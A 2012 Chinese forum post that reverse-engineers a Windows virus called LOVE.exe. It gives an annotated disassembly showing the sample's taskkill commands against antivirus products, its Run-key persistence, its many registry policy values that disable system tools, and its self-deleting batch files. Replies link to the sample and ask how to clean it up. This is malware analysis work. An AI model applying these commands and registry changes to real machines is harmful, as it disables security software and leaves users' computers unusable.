LOVE.exe病毒简单分析
本帖最后由 Thend 于 2012-8-4 13:42 编辑基本信息
报告名称:对一恶意程序的分析作者:Thend
报告更新日期:2012.08.03
样本发现日期:未知
样本类型:恶性病毒
样本文件MD5 校验值: c0d9cec618648730f44f2d5a3bd403db
壳信息:无壳 语言:VC++6.0
可能受到威胁的系统:Windows
简介
加入注册表达到自启动,病毒文件同过自己释放一个图标,将图标设为所有应用程序默认图标,并禁用和隐藏了计算机大部分功能。使得计算机根本无法正常工作。
被感染系统及网络症状
隐藏:所有的文件和文件夹,开始菜单中的”运行“、“关机”、“注销”、“搜索”、“登陆”,磁盘驱动器,驱动器,文件夹选项,IE主页选项组,IE文件菜单,IE收藏夹栏,internet选项。
禁用:控制面板,任务管理器,驱动器,打印,IE查看源文件,IE下载功能,右键关联,重启切换到DOS环境,文档菜单,鼠标右键。
关闭所有杀软。所有应用程序图标更改。打开TXT和INF文件方式默认为:查看图片。
文件系统变化
C:\windows\system32\这个目录下生成一个名为Aver.ico的图片,在和主程序同目录下生成del.bat和ddel.bat两个文件,到最后,全部删除。
注册表变化
这部分变化直接在代码分析中了,很多很多,就不一一列出了。主要就有个:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe SUCCESS "C:\Documents andSettings\Administrator\桌面\LOVE.exe"
创建了个自启动项~
对恶意程序本体的分析:
CB/.55 push ebp ;在段首下断点
CC|.8BEC mov ebp,esp
CE|.81EC 14000000 sub esp,0x14
D4|.68 01030080 push 0x80000301
D9|.6A 00 push 0x0
DB|.68 E8030000 push 0x3E8
E0|.68 01000000 push 0x1
E5|.BB 703E4000 mov ebx,LOVE.00403E70
EA|.E8 64220000 call LOVE.00403353
EF|.83C4 10 add esp,0x10
F2|.68 00000000 push 0x0
F7|.BB 10354000 mov ebx,LOVE.00403510 ;j
FC|.E8 52220000 call LOVE.00403353
|.83C4 04 add esp,0x4
|.8945 FC mov ,eax
|.68 00000000 push 0x0
C|.BB 30354000 mov ebx,LOVE.00403530 ;j
|.E8 3D220000 call LOVE.00403353 ;载入病毒名字 LOVE.exe
|.83C4 04 add esp,0x4
|.8945 F8 mov ,eax
C|.FF75 F8 push
F|.68 D8994600 push LOVE.004699D8 ;\
|.FF75 FC push
|.B9 03000000 mov ecx,0x3
C|.E8 3EFFFFFF call LOVE.0040106F
|> \6A 00 push 0x0
|.6A 00 push 0x0
B|.6A 00 push 0x0
D|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 DA994600 push LOVE.004699DA ;C:\windows\system32\Aver.ico
|.68 01030080 push 0x80000301
E|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
A|.6A 00 push 0x0
C|.8B45 F4 mov eax,
F|.85C0 test eax,eax
|.75 05 jnz XLOVE.00401188
|.B8 F7994600 mov eax,LOVE.004699F7
|>50 push eax
|.68 04000000 push 0x4
E|.B8 01000000 mov eax,0x1
|.BB 10754400 mov ebx,LOVE.00447510
|.E8 C8210000 call LOVE.00403365 ;在C:\windows\system32\这个目录下生成一个名为Aver.ico的图片
D|.83C4 34 add esp,0x34
A7|.53 push ebx
A8|.E8 B2210000 call LOVE.0040335F
AD|.83C4 04 add esp,0x4
B0|>68 04000080 push 0x80000004
B5|.6A 00 push 0x0
B7|.68 DA994600 push LOVE.004699DA ;C:\windows\system32\Aver.ico
BC|.68 04000080 push 0x80000004
C1|.6A 00 push 0x0
C3|.68 F8994600 push LOVE.004699F8 ;SOFTWARE\Classes\exefile\DefaultIcon\
C8|.68 01030080 push 0x80000301
CD|.6A 00 push 0x0
CF|.68 04000000 push 0x4
D4|.68 03000000 push 0x3
D9|.BB 103B4000 mov ebx,LOVE.00403B10
DE|.E8 70210000 call LOVE.00403353 ;指定应用程序的默认图标是刚刚生成的那个Aver.ico
F0|.E8 5E210000 call LOVE.00403353 ;再次载入LOVE.exe
F5|.83C4 04 add esp,0x4
F8|.8945 FC mov ,eax
FB|.FF75 FC push
FE|.68 1E9A4600 push LOVE.00469A1E ;Software\Microsoft\Windows\CurrentVersion\Run\
|.B9 02000000 mov ecx,0x2
|.E8 62FEFFFF call LOVE.0040106F ;将LOVE.exe加入开机自启动项
FD|.83C4 04 add esp,0x4
|.8945 FC mov ,eax
|.68 4D9A4600 push LOVE.00469A4D ;\del.bat
|.FF75 FC push
B|.B9 02000000 mov ecx,0x2
|.E8 5AFDFFFF call LOVE.0040106F ;等会儿就会在桌面上生成个del.bat
|.83C4 08 add esp,0x8
|.8945 F8 mov ,eax
B|.8B5D FC mov ebx,
E|.85DB test ebx,ebx
|.74 09 je XLOVE.0040132B
|.53 push ebx
|.E8 37200000 call LOVE.0040335F
|.68 799A4600 push LOVE.00469A79 ;\ddel.bat
|.FF75 FC push
A|.B9 02000000 mov ecx,0x2
F|.E8 DBFCFFFF call LOVE.0040106F
|.83C4 08 add esp,0x8
|.8945 F8 mov ,eax
A|.8B5D FC mov ebx,
D|.85DB test ebx,ebx
F|.74 09 je XLOVE.004013AA
A1|.53 push ebx
A2|.E8 B81F0000 call LOVE.0040335F
A7|.83C4 04 add esp,0x4
AA|>68 05000080 push 0x80000005
AF|.6A 00 push 0x0
B1|.68 839A4600 push LOVE.00469A83
B6|.68 04000080 push 0x80000004
BB|.6A 00 push 0x0
BD|.8B45 F8 mov eax,
C0|.85C0 test eax,eax
C2|.75 05 jnz XLOVE.004013C9
C4|.B8 F7994600 mov eax,LOVE.004699F7
C9|>50 push eax
CA|.68 02000000 push 0x2
CF|.BB 30374000 mov ebx,LOVE.00403730
D4|.E8 7A1F0000 call LOVE.00403353 ;在桌面上生成个ddel.bat
D9|.83C4 1C add esp,0x1C
E4|.E8 761F0000 call LOVE.0040335F
E9|.83C4 04 add esp,0x4
EC|>68 00000000 push 0x0
F1|.B8 01000000 mov eax,0x1
F6|.BB 20764400 mov ebx,LOVE.00447620
FB|.E8 651F0000 call LOVE.00403365 ;任务栏了没有了。。。
|.83C4 04 add esp,0x4
|.68 00000000 push 0x0
|.B8 01000000 mov eax,0x1
D|.BB C0754400 mov ebx,LOVE.004475C0
|.E8 4E1F0000 call LOVE.00403365
|.83C4 04 add esp,0x4
|.8945 FC mov ,eax
|.68 799A4600 push LOVE.00469A79 ;\ddel.bat
B|.FF75 FC push
E|.B9 02000000 mov ecx,0x2
|.E8 17FCFFFF call LOVE.0040106F
|.83C4 08 add esp,0x8
B|.8945 F8 mov ,eax
E|.8B5D FC mov ebx,
|.85DB test ebx,ebx
|.74 09 je XLOVE.0040146E
|.53 push ebx
|.E8 F41E0000 call LOVE.0040335F
B|.83C4 04 add esp,0x4
E|>68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
A|.68 02000080 push 0x80000002
F|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.8B45 F8 mov eax,
|.85C0 test eax,eax
|.75 05 jnz XLOVE.00401499
|.B8 F7994600 mov eax,LOVE.004699F7
|>50 push eax
A|.68 03000000 push 0x3
F|.BB 80334000 mov ebx,LOVE.00403380
A4|.E8 AA1E0000 call LOVE.00403353 ;执行ddel.bat
D2|.E8 7C1E0000 call LOVE.00403353
D7|.83C4 10 add esp,0x10
DA|.68 01030080 push 0x80000301
DF|.6A 00 push 0x0
E1|.68 01000000 push 0x1
E6|.68 02000080 push 0x80000002
EB|.6A 00 push 0x0
ED|.68 00000000 push 0x0
F2|.68 04000080 push 0x80000004
F7|.6A 00 push 0x0
F9|.68 DA9A4600 push LOVE.00469ADA ;cmd /c taskkill /f /im Aver.exe
FE|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
|.E8 461E0000 call LOVE.00403353 ;删除那个Aver.ico图标
|.68 4D9A4600 push LOVE.00469A4D ;\del.bat
A|.FF75 FC push
D|.B9 02000000 mov ecx,0x2
|.E8 38FBFFFF call LOVE.0040106F
|.83C4 08 add esp,0x8
A|.8945 F8 mov ,eax
D|.8B5D FC mov ebx,
|.85DB test ebx,ebx
|.74 09 je XLOVE.0040154D
|.53 push ebx
|.E8 151E0000 call LOVE.0040335F
A|.83C4 04 add esp,0x4
D|>68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
|.68 02000080 push 0x80000002
E|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
A|.6A 00 push 0x0
C|.8B45 F8 mov eax,
F|.85C0 test eax,eax
|.75 05 jnz XLOVE.00401578
|.B8 F7994600 mov eax,LOVE.004699F7
|>50 push eax
|.68 03000000 push 0x3
E|.BB 80334000 mov ebx,LOVE.00403380
|.E8 CB1D0000 call LOVE.00403353 ;执行del.bat并删除
|.E8 C71D0000 call LOVE.0040335F
|.83C4 04 add esp,0x4
B|>68 04000080 push 0x80000004
A0|.6A 00 push 0x0
A2|.68 FA9A4600 push LOVE.00469AFA ;2056年1月1日
A7|.68 01000000 push 0x1
AC|.BB B0354000 mov ebx,LOVE.004035B0
B1|.E8 9D1D0000 call LOVE.00403353
B6|.83C4 10 add esp,0x10
B9|.68 03000080 push 0x80000003
BE|.52 push edx
BF|.50 push eax
C0|.68 01000000 push 0x1
C5|.BB C0364000 mov ebx,LOVE.004036C0
CA|.E8 841D0000 call LOVE.00403353 ;把你系统的时间设置成2056年1月1日
D2|.68 01030080 push 0x80000301
D7|.6A 00 push 0x0
D9|.68 01000000 push 0x1
DE|.68 02000080 push 0x80000002
E3|.6A 00 push 0x0
E5|.68 00000000 push 0x0
EA|.68 04000080 push 0x80000004
EF|.6A 00 push 0x0
F1|.68 079B4600 push LOVE.00469B07 ;taskkill /f /im kavsvc.exe
F6|.68 03000000 push 0x3
FB|.BB 80334000 mov ebx,LOVE.00403380
|.E8 4E1D0000 call LOVE.00403353 ;找到并强制终止卡巴
|.68 01030080 push 0x80000301
D|.6A 00 push 0x0
F|.68 01000000 push 0x1
|.68 02000080 push 0x80000002
|.6A 00 push 0x0
B|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 229B4600 push LOVE.00469B22 ;taskkill /f /im KVXP.kxp
C|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
|.E8 181D0000 call LOVE.00403353 ;找到并强制终止江民杀软进程
E|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
A|.68 02000080 push 0x80000002
F|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.68 3B9B4600 push LOVE.00469B3B ;taskkill /f /im Rav.exe
|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
C|.E8 E21C0000 call LOVE.00403353 ;关闭瑞星
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
B|.68 01000000 push 0x1
|.68 02000080 push 0x80000002
|.6A 00 push 0x0
|.68 00000000 push 0x0
C|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 539B4600 push LOVE.00469B53 ;taskkill /f /im Ravmon.exe
|.68 03000000 push 0x3
D|.BB 80334000 mov ebx,LOVE.00403380
A2|.E8 AC1C0000 call LOVE.00403353 ;关闭瑞星的这个监视程序
AA|.68 01030080 push 0x80000301
AF|.6A 00 push 0x0
B1|.68 01000000 push 0x1
B6|.68 02000080 push 0x80000002
BB|.6A 00 push 0x0
BD|.68 00000000 push 0x0
C2|.68 04000080 push 0x80000004
C7|.6A 00 push 0x0
C9|.68 6E9B4600 push LOVE.00469B6E ;taskkill /f /im Mcshield.exe
CE|.68 03000000 push 0x3
D3|.BB 80334000 mov ebx,LOVE.00403380
D8|.E8 761C0000 call LOVE.00403353 ;关闭McAfee VirusScan核心进程
E0|.68 01030080 push 0x80000301
E5|.6A 00 push 0x0
E7|.68 01000000 push 0x1
EC|.68 02000080 push 0x80000002
F1|.6A 00 push 0x0
F3|.68 00000000 push 0x0
F8|.68 04000080 push 0x80000004
FD|.6A 00 push 0x0
FF|.68 8B9B4600 push LOVE.00469B8B ;taskkill /f /im VsTskMgr.exe
|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
E|.E8 401C0000 call LOVE.00403353 ;关闭McAfee VirusScan的一个组件
|.68 01030080 push 0x80000301
B|.6A 00 push 0x0
D|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 A89B4600 push LOVE.00469BA8 ;SOFTWARE\360Safe\safemon\ExecAccess
E|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 04000000 push 0x4
A|.68 03000000 push 0x3
F|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 0A1C0000 call LOVE.00403353
|.83C4 28 add esp,0x28
C|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
D|.6A 00 push 0x0
F|.68 CC9B4600 push LOVE.00469BCC ;SOFTWARE\360Safe\safemon\MonAccess
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
B|.68 04000000 push 0x4
|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
A|.E8 D41B0000 call LOVE.00403353
F|.83C4 28 add esp,0x28
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 00000000 push 0x0
E|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 EF9B4600 push LOVE.00469BEF ;SOFTWARE\360Safe\safemon\SiteAccess
A|.68 01030080 push 0x80000301
F|.6A 00 push 0x0
A1|.68 04000000 push 0x4
A6|.68 03000000 push 0x3
AB|.BB 103B4000 mov ebx,LOVE.00403B10
B0|.E8 9E1B0000 call LOVE.00403353
B5|.83C4 28 add esp,0x28
B8|.68 01030080 push 0x80000301
BD|.6A 00 push 0x0
BF|.68 00000000 push 0x0
C4|.68 04000080 push 0x80000004
C9|.6A 00 push 0x0
CB|.68 139C4600 push LOVE.00469C13 ;SOFTWARE\360Safe\safemon\UDiskAccess
D0|.68 01030080 push 0x80000301
D5|.6A 00 push 0x0
D7|.68 04000000 push 0x4
DC|.68 03000000 push 0x3
E1|.BB 103B4000 mov ebx,LOVE.00403B10
E6|.E8 681B0000 call LOVE.00403353
EB|.83C4 28 add esp,0x28
EE|.68 01030080 push 0x80000301
F3|.6A 00 push 0x0
F5|.68 01000000 push 0x1
FA|.68 02000080 push 0x80000002
FF|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.68 389C4600 push LOVE.00469C38 ;taskkill /f /im 360tray.exe
|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
C|.E8 321B0000 call LOVE.00403353 ;反正就是把360所有的关闭掉
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
B|.68 549C4600 push LOVE.00469C54 ;jpegfile
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 5D9C4600 push LOVE.00469C5D ;.txt\
C|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
|.68 03000000 push 0x3
D|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 FC1A0000 call LOVE.00403353
|.83C4 28 add esp,0x28
A|.68 04000080 push 0x80000004
F|.6A 00 push 0x0
|.68 549C4600 push LOVE.00469C54 ;jpegfile
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.68 639C4600 push LOVE.00469C63 ;.inf\
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
E|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 C61A0000 call LOVE.00403353 ;设置:所有的TXT文件和inf文件打开方式都默认为图片查看
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 00000000 push 0x0
C|.68 04000080 push 0x80000004
A1|.6A 00 push 0x0
A3|.68 699C4600 push LOVE.00469C69 ;SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
A8|.68 01030080 push 0x80000301
AD|.6A 00 push 0x0
AF|.68 04000000 push 0x4
B4|.68 03000000 push 0x3
B9|.BB 103B4000 mov ebx,LOVE.00403B10
BE|.E8 901A0000 call LOVE.00403353 ;隐藏文件和文件夹
C6|.68 01030080 push 0x80000301
CB|.6A 00 push 0x0
CD|.68 00000000 push 0x0
D2|.68 04000080 push 0x80000004
D7|.6A 00 push 0x0
D9|.68 C89C4600 push LOVE.00469CC8 ;Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
DE|.68 01030080 push 0x80000301
E3|.6A 00 push 0x0
E5|.68 03000000 push 0x3
EA|.68 03000000 push 0x3
EF|.BB 103B4000 mov ebx,LOVE.00403B10
F4|.E8 5A1A0000 call LOVE.00403353 ;禁用任务管理器
FC|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
|.68 04000080 push 0x80000004
D|.6A 00 push 0x0
F|.68 119D4600 push LOVE.00469D11 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
B|.68 03000000 push 0x3
|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
A|.E8 241A0000 call LOVE.00403353 ;禁用控制面板
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
E|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 5C9D4600 push LOVE.00469D5C ;Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
A|.68 01030080 push 0x80000301
F|.6A 00 push 0x0
|.68 03000000 push 0x3
|.68 03000000 push 0x3
B|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 EE190000 call LOVE.00403353 ;禁用注册表
|.68 01030080 push 0x80000301
D|.6A 00 push 0x0
F|.68 01000000 push 0x1
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
B|.68 AB9D4600 push LOVE.00469DAB ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 03000000 push 0x3
C|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 B8190000 call LOVE.00403353 ;隐藏开始菜单中的运行。
E|.68 01030080 push 0x80000301
A3|.6A 00 push 0x0
A5|.68 01000000 push 0x1
AA|.68 04000080 push 0x80000004
AF|.6A 00 push 0x0
B1|.68 ED9D4600 push LOVE.00469DED ;SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
B6|.68 01030080 push 0x80000301
BB|.6A 00 push 0x0
BD|.68 03000000 push 0x3
C2|.68 03000000 push 0x3
C7|.BB 103B4000 mov ebx,LOVE.00403B10
CC|.E8 82190000 call LOVE.00403353 ;禁用所有的磁盘驱动器,无论在哪儿都看不到磁盘
D4|.68 01060080 push 0x80000601
D9|.68 FFFFEF41 push 0x41EFFFFF
DE|.68 0000E0FF push 0xFFE00000
E3|.68 04000080 push 0x80000004
E8|.6A 00 push 0x0
EA|.68 379E4600 push LOVE.00469E37 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
EF|.68 01030080 push 0x80000301
F4|.6A 00 push 0x0
F6|.68 03000000 push 0x3
FB|.68 03000000 push 0x3
A00|.BB 103B4000 mov ebx,LOVE.00403B10
A05|.E8 49190000 call LOVE.00403353 ;隐藏所有驱动器
A0D|.68 01060080 push 0x80000601
A12|.68 FFFFEF41 push 0x41EFFFFF
A17|.68 0000E0FF push 0xFFE00000
A1C|.68 04000080 push 0x80000004
A21|.6A 00 push 0x0
A23|.68 7C9E4600 push LOVE.00469E7C ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
A28|.68 01030080 push 0x80000301
A2D|.6A 00 push 0x0
A2F|.68 03000000 push 0x3
A34|.68 03000000 push 0x3
A39|.BB 103B4000 mov ebx,LOVE.00403B10
A3E|.E8 10190000 call LOVE.00403353 ;禁用所有驱动器
A46|.68 01030080 push 0x80000301
A4B|.6A 00 push 0x0
A4D|.68 01000000 push 0x1
A52|.68 04000080 push 0x80000004
A57|.6A 00 push 0x0
A59|.68 C69E4600 push LOVE.00469EC6 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
A5E|.68 01030080 push 0x80000301
A63|.6A 00 push 0x0
A65|.68 03000000 push 0x3
A6A|.68 03000000 push 0x3
A6F|.BB 103B4000 mov ebx,LOVE.00403B10
A74|.E8 DA180000 call LOVE.00403353 ;禁用文件夹选项
A7C|.68 01030080 push 0x80000301
A81|.6A 00 push 0x0
A83|.68 01000000 push 0x1
A88|.68 04000080 push 0x80000004
A8D|.6A 00 push 0x0
A8F|.68 129F4600 push LOVE.00469F12 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
A94|.68 01030080 push 0x80000301
A99|.6A 00 push 0x0
A9B|.68 03000000 push 0x3
AA0|.68 03000000 push 0x3
AA5|.BB 103B4000 mov ebx,LOVE.00403B10
AAA|.E8 A4180000 call LOVE.00403353 ;隐藏开始菜单中的关机
AB2|.68 01030080 push 0x80000301
AB7|.6A 00 push 0x0
AB9|.68 01000000 push 0x1
ABE|.68 04000080 push 0x80000004
AC3|.6A 00 push 0x0
AC5|.68 569F4600 push LOVE.00469F56 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
ACA|.68 01030080 push 0x80000301
ACF|.6A 00 push 0x0
AD1|.68 03000000 push 0x3
AD6|.68 03000000 push 0x3
ADB|.BB 103B4000 mov ebx,LOVE.00403B10
AE0|.E8 6E180000 call LOVE.00403353 ;隐藏开始菜单中的搜索
AE8|.68 01030080 push 0x80000301
AED|.6A 00 push 0x0
AEF|.68 01000000 push 0x1
AF4|.68 04000080 push 0x80000004
AF9|.6A 00 push 0x0
AFB|.68 999F4600 push LOVE.00469F99 ;Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage
B00|.68 01030080 push 0x80000301
B05|.6A 00 push 0x0
B07|.68 03000000 push 0x3
B0C|.68 03000000 push 0x3
B11|.BB 103B4000 mov ebx,LOVE.00403B10
B16|.E8 38180000 call LOVE.00403353 ;隐藏IE的主页选项组
B1E|.68 01030080 push 0x80000301
B23|.6A 00 push 0x0
B25|.68 01000000 push 0x1
B2A|.68 04000080 push 0x80000004
B2F|.6A 00 push 0x0
B31|.68 DE9F4600 push LOVE.00469FDE ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
B36|.68 01030080 push 0x80000301
B3B|.6A 00 push 0x0
B3D|.68 03000000 push 0x3
B42|.68 03000000 push 0x3
B47|.BB 103B4000 mov ebx,LOVE.00403B10
B4C|.E8 02180000 call LOVE.00403353 ;隐藏IE文件菜单
B54|.68 01030080 push 0x80000301
B59|.6A 00 push 0x0
B5B|.68 01000000 push 0x1
B60|.68 04000080 push 0x80000004
B65|.6A 00 push 0x0
B67|.68 25A04600 push LOVE.0046A025 ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites
B6C|.68 01030080 push 0x80000301
B71|.6A 00 push 0x0
B73|.68 03000000 push 0x3
B78|.68 03000000 push 0x3
B7D|.BB 103B4000 mov ebx,LOVE.00403B10
B82|.E8 CC170000 call LOVE.00403353 ;隐藏收藏夹选项
B8A|.68 01030080 push 0x80000301
B8F|.6A 00 push 0x0
B91|.68 01000000 push 0x1
B96|.68 04000080 push 0x80000004
B9B|.6A 00 push 0x0
B9D|.68 6CA04600 push LOVE.0046A06C ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting
BA2|.68 01030080 push 0x80000301
BA7|.6A 00 push 0x0
BA9|.68 03000000 push 0x3
BAE|.68 03000000 push 0x3
BB3|.BB 103B4000 mov ebx,LOVE.00403B10
BB8|.E8 96170000 call LOVE.00403353 ;禁用IE的打印功能
BC0|.68 01030080 push 0x80000301
BC5|.6A 00 push 0x0
BC7|.68 01000000 push 0x1
BCC|.68 04000080 push 0x80000004
BD1|.6A 00 push 0x0
BD3|.68 B2A04600 push LOVE.0046A0B2 ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
BD8|.68 01030080 push 0x80000301
BDD|.6A 00 push 0x0
BDF|.68 03000000 push 0x3
BE4|.68 03000000 push 0x3
BE9|.BB 103B4000 mov ebx,LOVE.00403B10
BEE|.E8 60170000 call LOVE.00403353 ;隐藏INTERTER选项
BF6|.68 01030080 push 0x80000301
BFB|.6A 00 push 0x0
BFD|.68 01000000 push 0x1
C02|.68 04000080 push 0x80000004
C07|.6A 00 push 0x0
C09|.68 FEA04600 push LOVE.0046A0FE ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource
C0E|.68 01030080 push 0x80000301
C13|.6A 00 push 0x0
C15|.68 03000000 push 0x3
C1A|.68 03000000 push 0x3
C1F|.BB 103B4000 mov ebx,LOVE.00403B10
C24|.E8 2A170000 call LOVE.00403353 ;禁止IE查看源文件
C2C|.68 01030080 push 0x80000301
C31|.6A 00 push 0x0
C33|.68 03000000 push 0x3
C38|.68 04000080 push 0x80000004
C3D|.6A 00 push 0x0
C3F|.68 46A14600 push LOVE.0046A146 ;Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
C44|.68 01030080 push 0x80000301
C49|.6A 00 push 0x0
C4B|.68 03000000 push 0x3
C50|.68 03000000 push 0x3
C55|.BB 103B4000 mov ebx,LOVE.00403B10
C5A|.E8 F4160000 call LOVE.00403353 ;禁用IE下载功能
C62|.68 01030080 push 0x80000301
C67|.6A 00 push 0x0
C69|.68 01000000 push 0x1
C6E|.68 04000080 push 0x80000004
C73|.6A 00 push 0x0
C75|.68 8FA14600 push LOVE.0046A18F ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu
C7A|.68 01030080 push 0x80000301
C7F|.6A 00 push 0x0
C81|.68 03000000 push 0x3
C86|.68 03000000 push 0x3
C8B|.BB 103B4000 mov ebx,LOVE.00403B10
C90|.E8 BE160000 call LOVE.00403353 ;禁用右键关联
C98|.68 01030080 push 0x80000301
C9D|.6A 00 push 0x0
C9F|.68 01000000 push 0x1
CA4|.68 04000080 push 0x80000004
CA9|.6A 00 push 0x0
CAB|.68 DFA14600 push LOVE.0046A1DF ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
CB0|.68 01030080 push 0x80000301
CB5|.6A 00 push 0x0
CB7|.68 03000000 push 0x3
CBC|.68 03000000 push 0x3
CC1|.BB 103B4000 mov ebx,LOVE.00403B10
CC6|.E8 88160000 call LOVE.00403353 ;禁止重启切换到DOS环境下
CCE|.68 01030080 push 0x80000301
CD3|.6A 00 push 0x0
CD5|.68 01000000 push 0x1
CDA|.68 04000080 push 0x80000004
CDF|.6A 00 push 0x0
CE1|.68 26A24600 push LOVE.0046A226 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
CE6|.68 01030080 push 0x80000301
CEB|.6A 00 push 0x0
CED|.68 03000000 push 0x3
CF2|.68 03000000 push 0x3
CF7|.BB 103B4000 mov ebx,LOVE.00403B10
CFC|.E8 52160000 call LOVE.00403353 ;禁止注销计算机
D04|.68 01030080 push 0x80000301
D09|.6A 00 push 0x0
D0B|.68 01000000 push 0x1
D10|.68 04000080 push 0x80000004
D15|.6A 00 push 0x0
D17|.68 6BA24600 push LOVE.0046A26B ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
D1C|.68 01030080 push 0x80000301
D21|.6A 00 push 0x0
D23|.68 03000000 push 0x3
D28|.68 03000000 push 0x3
D2D|.BB 103B4000 mov ebx,LOVE.00403B10
D32|.E8 1C160000 call LOVE.00403353 ;禁用文档菜单
其中还有很多操作,但是都是一样的,这里就不一一列出来了,基本上都是很简单的一些注册表操作。运行到下面,基本上就结束了:C9/.55 push ebp
CA|.8BEC mov ebp,esp
CC|.68 04000080 push 0x80000004
D1|.6A 00 push 0x0
D3|.68 9FC44600 push LOVE.0046C49F ;LOVE
D8|.68 01030080 push 0x80000301
DD|.6A 00 push 0x0
DF|.68 00000000 push 0x0
E4|.68 04000080 push 0x80000004
E9|.6A 00 push 0x0
EB|.68 A4C44600 push LOVE.0046C4A4 ;李研我爱你!
F0|.68 03000000 push 0x3
F5|.BB E03B4000 mov ebx,LOVE.00403BE0
FA|.E8 54000000 call LOVE.00403353 ;到此处,基本完事,这儿就是弹出消息框:“李研我爱你!”
FF|.83C4 28 add esp,0x28
|.8BE5 mov esp,ebp
|.5D pop ebp
补充:
生成的del.bat文件和ddel.bat文件的内容:
del.bat:
del Aver.exe del.bat ---->删除Aver.exe和del.bat
del %
ddel.bat:
@echo off
taskkill /f /im expleror.exe ---->强制终止expleror.exe进程,也就是桌面进程。
start expleror.exe ---->重新启动。 这儿就是为了显示:所有应用程序图标变化。执行之后,所有应用程序的默认图标都是那个Aver.ico
del ddel.bat ---->删除自己。
exit
第一次分析,其中还有很多地方,很多细节没有分析到位,请各位大大多多指教。。。
很不错,很详细。:loveliness: 没样本? Sound 发表于 2012-8-4 13:43 static/image/common/back.gif
没样本?
额。。。样本就在论坛里,,,我去找找链接~~~ http://www.52pojie.cn/forum.php?mod=viewthread&tid=156144&extra=page%3D1%26filter%3Dtypeid%26typeid%3D15%26typeid%3D15
这个是样本的链接~感谢提供样本的这位兄弟。 谢谢思路。 那解决办法呢?话说有个和这个病毒差不多的病毒 效果是差不多 也是禁用很多功能 然后EXE的打开方式是查看图片 应该怎么解决他呢 1354669803 发表于 2012-8-4 13:56 static/image/common/back.gif
那解决办法呢?话说有个和这个病毒差不多的病毒 效果是差不多 也是禁用很多功能 然后EXE的打开方式是查看图 ...
